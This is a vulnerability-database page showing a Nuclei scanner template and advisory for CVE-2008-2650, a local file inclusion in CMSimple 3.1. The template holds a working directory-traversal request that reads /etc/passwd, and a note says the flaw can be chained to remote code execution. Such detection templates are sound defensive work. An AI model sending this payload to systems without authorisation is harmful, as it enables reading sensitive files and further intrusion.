Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nucleiProjectDiscoveryNUCLEI:CVE-2008-2650
HistoryMar 02, 2021 - 7:48 a.m.

CMSimple 3.1 - Local File Inclusion

2021-03-0207:48:13
ProjectDiscovery
github.com
13

6.8 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

7.2 High

AI Score

Confidence

High

0.063 Low

EPSS

Percentile

93.7%

JSON
CMSimple 3.1 is susceptible to local file inclusion via cmsimple/cms.php when register_globals is enabled which allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number.

id: CVE-2008-2650

info:
  name: CMSimple 3.1 - Local File Inclusion
  author: pussycat0x
  severity: medium
  description: |
    CMSimple 3.1 is susceptible to local file inclusion via cmsimple/cms.php when register_globals is enabled which allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.
  remediation: |
    Upgrade CMSimple to a patched version or apply the necessary security patches provided by the vendor.
  reference:
    - http://www.cmsimple.com/forum/viewtopic.php?f=2&t=17
    - http://web.archive.org/web/20140729144732/http://secunia.com:80/advisories/30463
    - https://nvd.nist.gov/vuln/detail/CVE-2008-2650
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/42792
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/42793
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
    cvss-score: 6.8
    cve-id: CVE-2008-2650
    cwe-id: CWE-22
    epss-score: 0.06344
    epss-percentile: 0.93486
    cpe: cpe:2.3:a:cmsimple:cmsimple:3.1:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: cmsimple
    product: cmsimple
    shodan-query: cpe:"cpe:2.3:a:cmsimple:cmsimple"
  tags: cve,cve2008,lfi,cmsimple

http:
  - raw:
      - |
        GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a00463044022003b63e7cd7ab09897735b1866b0ce2b3aedc493e01965112604d9981a58d09fe02200db2d75ecbfa5669fc8cc988fcf93ee338fa4d396b07f4d60bb219df3cd58bc6:922c64590222798bb761d5b6d8e72950

Related

nvd 1
cvelist 1
prion 1
cve 1
nvd
nvd
CVE-2008-2650
2008-06-10 18:32:00
cvelist
cvelist
CVE-2008-2650
2008-06-10 18:00:00
prion
prion
Directory traversal
2008-06-10 18:32:00
cve
cve
CVE-2008-2650
2008-06-10 18:32:00

6.8 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

7.2 High

AI Score

Confidence

High

0.063 Low

EPSS

Percentile

93.7%

JSON
Related for NUCLEI:CVE-2008-2650
nvd1cvelist1prion1cve1